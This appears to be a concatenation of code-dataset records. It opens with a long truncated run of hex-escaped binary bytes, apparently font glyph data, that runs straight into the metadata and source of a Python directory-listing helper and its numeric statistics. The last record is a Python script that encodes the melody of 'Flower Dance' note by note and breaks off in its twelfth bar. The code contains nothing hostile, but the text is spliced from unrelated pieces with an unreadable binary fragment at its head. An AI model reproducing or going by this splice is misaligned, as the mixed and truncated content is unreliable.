8\xc4\x66\xc6\x48\x04\x2f\x4b\x89\xf7\x67\x00\xde\x19\x4b\x4a\xd0\x85\xc1\x85\x07\x22\x07\x13\x43\x57\x7e\x34\x31\x43\x71\x20\x72\x34\xb8\x10\x00\xdf\x24\x8c\x4a\xf0\x95\xb2\x23\x0a\x9a\xbd\x11\x9a\x11\x1a\x91\x1a\x91\x1a\x19\x1a\xa1\x99\x21\x99\xa9\x98\x3a\xb3\x6b\x12\x63\x62\x31\x52\x02\xe0\x1f\x4c\x46\xd0\x9d\x51\x59\xf5\x40\x46\x07\x32\x51\x93\xab\x6e\x0e\x44\x68\x46\x86\x46\x86\x46\x66\x68\x2c\x48\x68\x06\xe1\x1e\x4c\x46\xd0\xb5\x49\xed\xc1\x8c\x0e\x64\xa2\x26\x57\xdd\x1c\x88\xd0\x8c\x0c\x8d\x0c\x8d\xcc\xd0\x58\x90\xd0\x0c\xe2\x22\x4c\x46\xd0\x25\x42\x3a\x11\x29\x21\x79\x10\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\xe3\x22\x2c\x46\xd0\x9d\x99\xa0\x83\x20\x91\x79\x18\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\xe4\x20\x0c\x46\xd0\x15\x19\x29\x19\x79\x18\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\xe5\x22\x4c\x46\xd0\x2d\xc9\x90\xc0\x90\x48\x79\x28\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\xe6\x26\xb2\x45\xb0\x9e\x1a\xa2\x83\x03\x91\x28\x9a\xc1\xa9\xb9\xa9\x99\x83\x83\x88\x83\x37\x83\x43\x83\x43\x74\x33\x12\x53\x11\x36\x07\x21\x54\x16\x00\xe7\x1a\x4b\xc6\xad\xa5\x93\x03\x09\xaa\x88\xb9\xc1\x5d\x0e\x52\x85\x1c\x08\x99\x85\xc6\x4a\xca\x0d\x01\xe8\x19\x4b\x46\xd0\x9d\x49\x51\xf5\x20\x55\x37\x4b\xa4\xac\x0e\x3e\x9c\x1c\xa4\x0a\x39\x10\xb2\x00\xe9\x18\x4b\x46\xd0\xb5\x41\xed\x81\xaa\x6e\x96\x48\x59\x1d\x7c\x38\x39\x48\x15\x72\x20\x64\x01\xea\x1b\x4b\x46\xd0\x25\x3a\x32\x11\x21\xf5\x00\x55\x37\x4b\xa4\xac\x0e\x3e\x9c\x1c\xa4\x0a\x39\x10\xb2\x00\xeb\x1a\x0b\x46\xd0\x15\x19\x21\x19\x79\x88\xaa\x9b\x25\x52\x56\x07\x1f\x4e\x0e\x52\x85\x1c\x08\x59\x00\xec\x0c\x45\x52\xf0\x84\x19\x21\x75\x23\xfb\x3f\xed\x0c\x45\x4a\xf0\x94\x11\x0d\x47\xf6\x7f\x02\xee\x10\x48\x52\xf0\x14\x22\x1a\x11\x09\x21\xd1\xa9\xfd\x
df\x00\xef\x0d\x07\x52\xf0\x04\x19\x1a\xc9\xa1\xfd\x9f\x00\xf0\x1f\x4c\x4a\xf0\x85\xab\x18\xb2\x3a\x11\xb1\x20\xb1\xa3\x03\x11\x9a\x09\xa2\x33\x9f\x4d\x0c\x8d\xd0\xcc\x1c\x44\xd9\x00\xf1\x16\x2b\x4a\x10\x96\x99\x98\x83\x18\x91\xf1\x11\x92\x09\x8b\x9a\x23\x2b\xff\xd5\x00\xf2\x1b\x4d\x46\xf0\x9d\x59\x61\xf5\x70\x65\x07\x32\x4c\xa6\x26\xe6\x7c\x37\x31\x35\x42\x43\x73\x20\x56\x04\xf3\x1b\x4d\x46\xf0\xbd\x51\xed\x01\xcb\x0e\x64\x98\x4c\x4d\xcc\xf9\x6e\x62\x6a\x84\x86\xe6\x40\xac\x08\x00\xf4\x1e\x4d\x46\xf0\x2d\x4a\x42\x11\x31\x21\x79\xa0\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\xf5\x1e\x2d\x46\xf0\xa5\x99\xa8\x83\x28\x91\x79\xa8\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\xf6\x1b\x0d\x46\xf0\x1d\x65\x32\xf2\x50\x65\x07\x32\x4c\xa6\x26\xe6\x7c\x37\x31\x35\x42\x43\x73\x20\x56\x04\xf7\x11\xaf\x41\x10\xb6\xe1\xf5\x98\x1d\x7c\x20\x8f\x6c\x78\x19\x00\xf8\x22\xad\x45\xf0\xa5\x8a\x91\x83\x11\x1a\x92\x21\x8a\x21\x09\x9b\x09\x93\x11\x8b\x19\x0b\xa1\x09\xa2\x11\x1a\x92\x83\x91\x89\x22\x00\xf9\x13\x4b\x4a\x10\x96\x49\x51\xf5\x00\x53\xfe\x47\x37\x15\x16\x23\x24\x03\xfa\x12\x4b\x4a\x10\xb6\x41\xed\x21\xa6\xfc\x8f\x6e\x2a\x2c\x46\x48\x06\xfb\x14\x4b\x4a\x10\x26\x3a\x32\x11\x21\xc5\x53\xfe\x47\x37\x15\x16\x23\x24\x03\xfc\x13\x0b\x4a\x10\x16\x19\x21\x19\xe9\x29\xff\xa3\x9b\x0a\x8b\x11\x92\x01\xfd\x24\xed\xc2\xad\xbd\x51\xed\x81\x06\xcd\x44\xc6\x44\xa6\x46\x88\x84\x86\x84\x48\xc4\x46\xc4\x26\xe4\x0c\x0b\x49\x47\x65\x45\x47\x45\xe7\x00\xfe\x1b\xcc\xca\x0d\x86\xc9\x9d\xd0\x4c\x5c\xd4\x4c\x4c\x9d\xf9\xd5\x04\x0d\xc5\xc1\xc8\x44\xcd\xe4\x2e\x01\xff\x25\xad\xc2\xad\x1d\x65\x32\xf2\x10\x83\x66\x22\x63\x22\x53\x23\x44\x42\x43\x42\x24\x62\x23\x62\x13\x72\x86\x85\xa4\xa3\xb2\xa2\xa3\xa2\x73\x00\x00\x00\x00\x08\x01\x64\x0b\x5b\xff\xff\x01\x00\x28\xb1\x42\x30\xae\xd3\x7b\xf0\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\x01\x01\x1f\x0c\x46\xd0\x9d\xab\x7b\x10\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\x01\x02\x2c\xf1\x42\x30\x2e\x21\x49\x21\x51\x63\x7a\x04\xe3\xc4\x8d\x25\x46\x45\x46\x45\x08\x67\x06\x85\x06\xa5\xc6\xc4\xc6\x0e\x8a\x0e\x8c\x04\x87\x24\x47\x44\x47\x44\x8d\x07\x01\x03\x21\x4c\x46\xd0\x15\x21\xad\xec\xe8\x81\x8c\x0e\x64\xa2\x26\x57\xdd\x1c\x88\xd0\x8c\x0c\x8d\x0c\x8d\xcc\xd0\x58\x90\xd0\x0c\x01\x04\x2c\xd1\x42\x2e\xbe\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x93\xe2\xf2\x00\xf2\x10\x53\x00\x01\x05\x21\x2c\x46\xce\x1d\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x53\x92\xa2\xb2\x43\x00\x01\x06\x21\xef\x46\x30\xc6\x61\xed\xa1\x0f\xa2\x0e\x48\xca\x44\x66\x87\x67\x87\xf7\x98\x78\x98\x32\xa4\x6a\xe6\xa0\xea\x20\x04\x00\x01\x07\x19\x4b\x46\xb0\xb5\x41\xed\xa1\x4e\x0e\x24\xa8\x22\xe6\x06\x77\x39\x48\x15\x72\x20\x64\x01\x01\x08\x24\xef\x46\x30\x36\x5a\x52\x11\x41\x21\x79\xc8\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x3d\x26\x1e\xa6\x0c\xa9\x9a\x39\xa8\x3a\x08\x01\x01\x09\x1c\x4b\x46\xb0\x25\x3a\x32\x11\x21\xf5\x10\x27\x07\x12\x54\x11\x73\x83\xbb\x1c\xa4\x0a\x39\x10\xb2\x00\x01\x0a\x20\xcf\x46\x30\x3e\x69\xf5\xc0\x07\x51\x07\x24\x65\x22\xb3\xc3\xb3\xc3\x7b\x4c\x3c\x4c\x19\x52\x35\x73\x50\x75\x10\x02\x01\x0b\x19\x2b\x46\xb0\x2d\x49\xf5\x40\x27\x07\x12\x54\x11\x73\x83\xbb\x1c\xa4\x0a\x39\x10\xb2\x00\x01\x0c\x23\xef\x46\x30\x26\x85\x22\xa2\xb4\xf4\xb0\x07\x51\x07\x24\x65\x22\xb3\xc3\xb3\xc3\x7b\x4c\x3c\x4c\x19\x52\x35\x73\x50\x75\x10\x02\x01\x0d\x1c\x4b\
x46\xb0\x15\x21\x25\x62\x74\xf4\x30\x27\x07\x12\x54\x11\x73\x83\xbb\x1c\xa4\x0a\x39\x10\xb2\x00\x01\x0e\x27\xef\x4a\x70\x1e\x21\x41\x11\x51\x5a\x7a\xb0\x83\xa9\x83\x9a\x31\x92\x39\x8a\xc1\x89\xc1\x4b\x7f\x29\x31\x38\x31\x37\x32\x46\x72\x40\x74\x20\x06\x01\x0f\x25\x52\x46\xb0\xce\x99\xc9\x99\xc9\x99\xc9\x21\xc9\x21\x19\x92\x19\x99\x83\x39\x1a\xba\xa9\xb1\xfd\x67\x54\x73\x33\x75\x17\x93\x24\x63\x00\x01\x10\x2c\x52\x42\x70\x9e\x83\xc1\x83\xb2\x31\xaa\x39\xa2\xc1\xa1\x41\x9a\xc9\x99\xc9\x03\xab\x03\xab\x99\xc9\x99\xc9\x99\x49\xa1\xc1\xa1\xb9\xa9\x31\xaa\x03\xba\x03\x31\x00\x01\x11\x1b\x4c\x46\x10\xce\x0d\xd9\x90\x8c\x1c\x4c\xd0\x50\x4c\x99\xf9\xec\x6a\x62\xa6\xe2\x62\x86\x64\x00\x01\x12\x19\xab\x4a\xd0\x8d\xa3\xf3\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x01\x01\x13\x19\x0b\x46\xd0\x95\xa3\x7b\x88\xaa\x9b\x25\x52\x56\x07\x1f\x4e\x0e\x52\x85\x1c\x08\x59\x00\x01\x14\x1e\xeb\x4a\xd0\x05\x21\x19\x21\x21\x33\x7a\x88\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x01\x01\x15\x1d\x4b\x46\xd0\x15\x21\x19\x21\x21\x33\x7a\x90\xaa\x9b\x25\x52\x56\x07\x1f\x4e\x0e\x52\x85\x1c\x08\x59\x00\x01\x16\x1a\xcb\x4a\xd0\x1d\x49\xf5\x20\x07\x13\x07\x13\x83\x7b\x78\x20\x72\x20\x32\xb8\x87\x07\x0f\x02\x01\x17\x19\x2b\x46\xd0\x2d\x49\xf5\x30\x55\x37\x4b\xa4\xac\x0e\x3e\x9c\x1c\xa4\x0a\x39\x10\xb2\x00\x01\x18\x1c\xcb\x4a\xce\x85\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x41\x82\x92\xa2\x43\x00\x01\x19\x1a\x2b\x46\xce\x9d\xaa\x9b\x25\x52\x56\x07\x1f\x4e\x0e\x52\x85\x1c\x08\x99\x09\x4a\x8a\xce\x00\x01\x1a\x1d\xeb\x4a\xd0\x05\x21\x25\x62\x74\xf4\x10\x07\x13\x07\x13\x83\x7b\x78\x20\x72\x20\x32\xb8\x87\x07\x0f\x02\x01\x1b\x1c\x4b\x46\xd0\x15\x21\x25\x62\x74\xf4\x20\x55\x37\x4b\xa4\xac\x0e\x3e\x9c\x1c\xa4\x0a\x39\x10\xb2\x00\x01\x1c\x27\xef\x46\x50\x36\x5a\x52\x11\x41\x21\x79\xc8\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x5d\x5a\x1e\x4e\x0c\x4e\xd0\x8d\x54\xcd\x1c\x54\x1d\x84\x00\x01\x1d\x26\xec\xc6\x0d\x26\x42\x3a\x11\x29\x21\x79\x10\x92\x91\x83\x09\x1a\x8a\x29\x33\x3f\x9b\x98\xa9\xb8\x98\x21\x99\x9c\x14\x09\x1b\x39\x10\xba\x01\x01\x1e\x26\xef\x46\x50\x26\x75\x42\x82\xa6\xf4\xb0\x07\x51\x07\x24\x65\x22\xb3\xc3\xb3\xc3\xbb\xb4\x3c\x9c\x18\x9c\xa0\x1b\xa9\x9a\x39\xa8\x3a\x08\x01\x01\x1f\x25\xec\xc6\x0d\x16\x21\xad\xec\xe8\x81\x48\x46\x0e\x26\x68\x28\xa6\xcc\xfc\x6c\x62\xa6\xe2\x62\x86\x64\x72\x52\x24\x6c\xe4\x40\xe8\x06\x00\x01\x20\x23\xcf\x46\x50\x3e\x69\xf5\xc0\x07\x51\x07\x24\x65\x22\xb3\xc3\xb3\xc3\xbb\xb4\x3c\x9c\x18\x9c\xa0\x1b\xa9\x9a\x39\xa8\x3a\x08\x01\x01\x21\x22\xcc\xc6\x0d\x2e\x51\xf5\x50\x24\x23\x07\x13\x34\x14\x53\x66\x7e\x36\x31\x53\x71\x31\x43\x32\x39\x29\x12\x36\x72\x20\x74\x03\x01\x22\x27\x6f\xc7\x4b\xb6\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x5d\x5a\x1e\x4e\x0c\x4e\xd0\x8d\x54\xcd\x1c\x54\x1d\xc4\x43\x0e\xaf\xd6\x58\x5a\x0c\x00\x01\x23\x25\x2c\xc7\x0d\x36\x49\x51\xd1\xc9\xf5\x40\x24\x23\x07\x13\x34\x14\x53\x66\x7e\x36\x31\x53\x71\x31\x43\x32\x39\x29\x12\x36\x72\x20\x74\x03\x01\x24\x17\xee\x4a\x50\x2e\x52\x4a\x11\x39\x21\x79\x90\x41\xff\xf0\xe0\x03\x43\xff\x70\x00\x01\x25\x29\xec\x46\x10\x16\x42\x3a\x11\x29\x21\x79\x90\xc9\x3d\xa1\x99\x30\xa9\x99\x20\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x1a\x01\x26\x13\x4e\x4a\x50\x86\x41\x0f\x0f\x3e\x30\x34\x3c\xf8\xc0\xd0\x3f\x1c\x01\x27\x15\x4b\x4a\x10\x86\xc1\x85\x65\x65\x23\x24\x13\x16\x35\x47\x56\xfe\xab\x01\x01\x28\x10\xc8\x42\xf0\x8c\x99\x03\x92\xd9\xa9\xfd\xff\x1b\x00\x01\x29\x0f\x28\x42\xf0\x8c\x99\x03\x92\xd9\xa9\xfd\xdf\x00\x01\x2a\x0d\xa7\x42\xf0\x84\x97\x43\xfb\xff\x27\x00\x01\x2b
\x0c\x07\x42\xf0\x84\x97\x43\xfb\x3f\x01\x01\x2c\x11\xe8\x42\xf0\x04\x21\x22\x09\x1b\xe2\xa9\xfd\xff\x1b\x00\x01\x2d\x10\x48\x42\xf0\x04\x21\x22\x09\x1b\xe2\xa9\xfd\xdf\x00\x01\x2e\x0f\xc4\x4a\xee\x84\x89\xfd\xff\x13\x09\x11\x99\x01\x01\x2f\x10\xc4\x4a\xee\x84\x89\x95\x13\xfb\x3f\x91\x10\x91\x19\x01\x30\x0c\xc3\x4a\xf0\x0c\x6d\x0e\xfe\x41\x01\x01\x31\x09\xa3\x49\xf0\x84\x3f\x20\x01\x32\x11\xcc\x4a\xee\x85\x31\xff\xff\xb3\xc9\xc1\x29\xb3\x1a\x00\x01\x33\x15\xec\xca\xed\x85\x31\x67\xf3\x90\x63\xfe\x3f\x9b\x5c\x14\x33\x75\x55\x03\x01\x34\x16\x6a\x3f\x0e\x25\x32\x2a\x11\x19\x21\x79\x80\xb9\xfd\xff\x67\x33\x46\x55\x00\x01\x35\x16\xea\xbe\x0d\x25\x32\x2a\x11\x19\x21\x79\x80\xb9\xfd\x7f\x12\x33\x73\x53\x05\x01\x36\x2f\x6e\xcb\x0b\x86\xb9\x89\x31\x99\xa9\x99\xa1\x45\x52\x33\x62\x23\x63\x13\x73\x86\x77\x13\x64\x23\x54\x33\x44\x43\x34\x43\x34\x53\x24\x63\x14\x73\xf4\x40\xb3\x8b\xb5\x15\x96\x03\x01\x37\x28\x6c\xcb\xeb\x85\xc9\xbd\x9a\x18\x1a\x99\x59\x32\x34\x22\x35\x21\x76\x35\x41\x34\x51\x33\x42\x33\x43\x32\x44\x31\x45\x0f\x31\xb9\x54\x4b\x51\x31\x00\x01\x38\x1f\xac\x49\xf0\x85\xa9\x89\xa1\x91\x99\x25\x43\x23\x52\x13\x62\x57\x13\x44\x13\x35\x23\x34\x33\x24\x43\x14\x53\x04\x01\x39\x11\xeb\x4a\xb0\x9d\x41\xed\x81\x06\xf7\xff\xc3\x83\x07\x01\x01\x3a\x0e\xe5\x4a\xf0\x94\x11\x0d\x47\xf6\xff\x4f\x00\x01\x3b\x14\x6b\xcb\xab\x85\xc1\xfd\xff\xf0\xe0\x41\xf8\xe0\x4a\x0d\x25\xc5\x00\x01\x3c\x10\x63\xcb\xeb\x84\xff\xa0\xe6\x40\x42\x05\x85\x04\x00\x01\x3d\x13\x4e\x4a\x50\x86\x41\x2f\x1b\x4a\xcc\xee\xdf\x1e\xd0\x1c\xd0\x00\x01\x3e\x0f\x49\x4a\xb0\x85\x19\x8f\xda\x48\x8c\xed\x7f\x06\x01\x3f\x27\x53\x4a\x90\x87\x79\x88\x79\x88\x79\x88\x79\x88\x79\x88\x79\x88\x79\x88\x79\x88\x79\x88\x69\xef\x21\xe6\x21\xe6\x21\xe6\x21\x0e\x08\x0f\x08\x01\x01\x40\x0e\x4e\x4a\xf0\x86\xd9\xfd\x43\x6f\xf7\x16\x00\x01\x41\x18\x4e\x42\xb0\x9d\xd9\x3d\x09\x9c\x10\x34\x24\x2c\x34\x0c\x99\xdd\xed\x01\xcd\x01\x01\x01\x42\x13\x49\x42\xf0\x9c\xb1\x3d\x89\xb1\xa9\xa1\xb1\x09\x19\xdb\x6f\x00\x01\x43\x26\xee\x4a\x70\xb6\x59\xed\xe1\x26\x0d\x0d\xef\x0e\xc2\x28\xc6\x28\xa8\x48\x88\x68\x86\x88\x66\x88\x48\xa8\x28\xc8\x26\xc8\x0e\xe2\x0e\x5d\x0e\x01\x44\x14\x4b\x4a\x10\xae\x41\xed\x41\x46\x48\x26\x2c\x6a\x8e\xac\xfc\x57\x03\x01\x45\x2a\x6e\xcb\x6b\x86\x49\x43\xc3\xbb\x83\x30\x8a\x31\x0a\x2a\x12\x22\x9a\x21\xa2\x19\x22\x12\x2a\x0a\xb2\x09\xb2\x83\xb8\x43\x97\xf3\x50\xb3\x8b\xb5\x15\x16\x03\x01\x46\x18\xcb\xca\x0b\x86\x11\x92\x09\x8b\x9a\x23\x2b\xff\xd5\x3c\xc0\xe0\x4a\x0d\x25\xa5\x00\x01\x47\x2a\xee\x4a\x70\x16\x21\x39\x11\x49\x52\x7a\xa8\x49\x43\xc3\xbb\x83\x30\x8a\x31\x0a\x2a\x12\x22\x9a\x21\xa2\x19\x22\x12\x2a\x0a\xb2\x09\xb2\x83\xb8\x43\x97\x03\x01\x48\x17\x4b\x4a\x10\x0e\x21\x25\x62\x74\xf4\x00\x23\x24\x13\x16\x35\x47\x56\xfe\xab\x01\x01\x49\x2c\x52\x46\xd0\x86\x79\x80\x79\x80\x79\x08\x79\x08\x79\x00\xa9\x11\xca\x09\xc3\x9a\x39\xa2\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\x01\x01\x4a\x29\xee\xca\x6d\x86\x49\x43\xc3\xbb\x83\x30\x8a\x31\x0a\x2a\x12\x22\x9a\x21\xa2\x19\x22\x12\x2a\x0a\xb2\x83\xb0\x83\xb8\x43\x97\xb3\xcb\x62\xe6\xee\x6a\x00\x01\x4b\x17\x4b\xca\x0d\x86\x11\x92\x09\x8b\x9a\x23\x2b\xff\xd5\xe0\x9a\x98\xa1\xa3\x1a\x00\x01\x4c\x23\xb1\x46\x70\xae\xd3\x7b\xe0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x01\x4d\x1b\x0d\x46\xf0\x9d\xb3\x7b\xa8\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\x01\x4e\x27\xf1\x46\x70\x2e\x21\x49\x21\x51\x63\x7a\xe8\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x7
575387332cfac7551ea5b0d1fe7f6fcc7ee87d72 | 746 | py | Python | BLib/Files/Search.py | Bwc9876/BLib | 41d4f794aa3878b2b5bce13da0a5eb610f4500f2 | [
"MIT"
] | null | null | null | BLib/Files/Search.py | Bwc9876/BLib | 41d4f794aa3878b2b5bce13da0a5eb610f4500f2 | [
"MIT"
] | null | null | null | BLib/Files/Search.py | Bwc9876/BLib | 41d4f794aa3878b2b5bce13da0a5eb610f4500f2 | [
"MIT"
] | null | null | null | import os
def get_files_in_dir_by_extension(directory, ext):
    """Return paths of files in `directory` whose names end with `.{ext}` (ext given without the leading dot)."""
    if not os.path.exists(directory):
        raise FileNotFoundError(f"'{directory}' not found")
    if os.path.isfile(directory):
        # A file path is not a valid search root; NotADirectoryError is the more precise builtin here.
        raise NotADirectoryError(f"'{directory}' is a file, not a directory")
    return [os.path.join(directory, f) for f in os.listdir(directory) if f.endswith(f".{ext}")]

def get_all_files_in_dir(directory):
    """Return paths of all entries directly inside `directory`."""
    if not os.path.exists(directory):
        raise FileNotFoundError(f"'{directory}' not found")
    if os.path.isfile(directory):
        raise NotADirectoryError(f"'{directory}' is a file, not a directory")
    return [os.path.join(directory, f) for f in os.listdir(directory)]
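# Usage sketch (illustrative, not part of the original file): given a folder
# docs/ containing a.md and b.txt, get_files_in_dir_by_extension("docs", "md")
# returns [os.path.join("docs", "a.md")], while get_all_files_in_dir("docs")
# returns both entries (subdirectories included, since os.listdir does not filter them out).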
| 24.064516 | 59 | 0.634048 | 101 | 746 | 4.594059 | 0.29703 | 0.077586 | 0.267241 | 0.275862 | 0.806034 | 0.806034 | 0.806034 | 0.806034 | 0.668103 | 0.668103 | 0 | 0 | 0.231903 | 746 | 30 | 60 | 24.866667 | 0.809773 | 0 | 0 | 0.8 | 0 | 0 | 0.131367 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.05 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
93d4b2e461308f7e04b86f23580caaefa2717f56 | 73,764 | py | Python | Examples/FlowerDance/FlowerDance.py | Authey/MidiUtilHelper | c03fb47fa09af15f0ba4fa15e1bb4a04b277ec0b | [
"MIT"
] | 1 | 2020-12-30T15:07:34.000Z | 2020-12-30T15:07:34.000Z | Examples/FlowerDance/FlowerDance.py | Authey/MidiUtilHelper | c03fb47fa09af15f0ba4fa15e1bb4a04b277ec0b | [
"MIT"
] | null | null | null | Examples/FlowerDance/FlowerDance.py | Authey/MidiUtilHelper | c03fb47fa09af15f0ba4fa15e1bb4a04b277ec0b | [
"MIT"
] | 1 | 2020-12-28T21:47:26.000Z | 2020-12-28T21:47:26.000Z | # Author: Authey
# Date: 13/06/2020
from Scales import Scales
class FlowerDance:
def __init__(self):
self.name = 'Flower Dance'
self.sc = Scales(200)
def generator(self):
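# Reading note (an assumption inferred from usage, not documented by the author):
# each bar first writes the right-hand "major" figure, then modify_time(x, 1)
# appears to rewind the write cursor by x beats so the left-hand "minor" figure
# of the same bar overlaps it, while a bare modify_time(x) advances the cursor
# by x beats to pad the bar out.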
# -------- first bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.g5(1)
self.sc.a5(2)
self.sc.modify_time(2)
# -------- second bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.a5(1)
self.sc.b5(2)
self.sc.modify_time(2)
# -------- third bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(2)
self.sc.modify_time(2)
# -------- fourth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# -------- fifth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.g5(1)
self.sc.a5(2)
self.sc.modify_time(2)
# -------- sixth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.a5(1)
self.sc.b5(2)
self.sc.modify_time(2)
# -------- seventh bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(2)
self.sc.modify_time(2)
# -------- eighth bar -------- #
# ---- major ---- #
self.sc.e6(8)
self.sc.modify_time(8, 1)
self.sc.a6(8)
self.sc.modify_time(8, 1)
self.sc.c7s(8)
self.sc.modify_time(8, 1)
self.sc.e7(8)
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(8)
self.sc.modify_time(8, 1)
self.sc.e5(8)
self.sc.modify_time(8, 1)
self.sc.a5(8)
# -------- ninth bar -------- #
# ---- major ---- #
self.sc.e6(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(4, 1)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(4, 1)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(7, 1)
# ---- minor ---- #
self.sc.c5(2)
self.sc.modify_time(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(2)
# -------- tenth bar -------- #
# ---- major ---- #
self.sc.b5(1.5)
self.sc.modify_time(1.5, 1)
self.sc.d6(1.5)
self.sc.b6(0.5)
self.sc.a6(1.5)
self.sc.g6s(0.5)
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.e7(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e4(1)
self.sc.b4(1)
self.sc.e5(1)
self.sc.g5s(1)
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.e5(1)
# -------- eleventh bar -------- #
# ---- major ---- #
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.a6(2)
self.sc.modify_time(2, 1)
self.sc.e7(2)
self.sc.d7(1)
self.sc.d7(0.333)  # three 0.333 notes approximate a one-beat triplet (3 x 1/3)
self.sc.e7(0.333)
self.sc.d7(0.333)
self.sc.b6(1)
self.sc.g6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.c5(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.d5(1)
# -------- twelfth bar -------- #
# ---- major ---- #
self.sc.a6(6)
self.sc.modify_time(1)
self.sc.e6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(1)
